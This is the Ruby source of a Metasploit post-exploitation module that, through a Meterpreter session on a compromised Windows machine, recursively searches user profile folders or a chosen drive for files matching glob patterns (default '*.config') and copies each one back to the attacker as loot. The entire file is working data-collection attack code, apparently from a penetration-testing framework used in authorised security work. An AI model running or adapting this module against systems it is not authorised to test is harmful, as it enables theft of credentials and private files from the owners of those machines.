modules/post/windows/gather/enum_files.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Windows::FileSystem
include Msf::Post::Windows::Version
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Gather Generic File Collection',
'Description' => %q{
This module downloads files recursively based on the FILE_GLOBS option.
},
'License' => MSF_LICENSE,
'Author' => [
'3vi1john <Jbabio[at]me.com>',
'RageLtMan <rageltman[at]sempervictus>'
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_fs_search
stdapi_railgun_api
stdapi_sys_config_getenv
]
}
}
)
)
register_options(
[
OptString.new('SEARCH_FROM', [ false, 'Search from a specific location. Ex. C:\\']),
OptString.new('FILE_GLOBS', [ true, 'The file pattern to search for in a filename', '*.config'])
]
)
end
def download_files(location, file_type)
sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
profile_path_old = sysdriv + '\\Documents and Settings\\'
profile_path_new = sysdriv + '\\Users\\'
version = get_version_info
if location
print_status("Searching #{location}")
getfile = client.fs.file.search(location, file_type, true, -1)
elsif version.build_number < Msf::WindowsVersion::Vista_SP0
print_status("Searching #{profile_path_old} through windows user profile structure")
getfile = client.fs.file.search(profile_path_old, file_type, true, -1)
else
# For systems such as: Windows 7|Windows Vista|2008
print_status("Searching #{profile_path_new} through windows user profile structure")
getfile = client.fs.file.search(profile_path_new, file_type, true, -1)
end
getfile.each do |file|
filename = "#{file['path']}\\#{file['name']}"
data = read_file(filename)
print_status("Downloading #{file['path']}\\#{file['name']}")
p = store_loot('host.files', 'application/octet-stream', session, data, file['name'], filename)
print_good("#{file['name']} saved as: #{p}")
end
end
def run
# When the location is set, make sure we have a valid path format
location = datastore['SEARCH_FROM']
if location && location !~ (%r{^([a-z]):[\\|/].*}i)
print_error("Invalid SEARCH_FROM option: #{location}")
return
end
# When the location option is set, make sure we have a valid drive letter
my_drive = ::Regexp.last_match(1)
drives = get_drives
if location && !drives.include?(my_drive)
print_error("#{my_drive} drive is not available, please try: #{drives.inspect}")
return
end
datastore['FILE_GLOBS'].split(',').each do |glob|
download_files(location, glob.strip)
rescue ::Rex::Post::Meterpreter::RequestError => e
if e.message =~ /The device is not ready/
print_error("#{my_drive} drive is not ready")
next
elsif e.message =~ /The system cannot find the path specified/
print_error('Path does not exist')
next
else
raise e
end
end
print_status('Done!')
end
end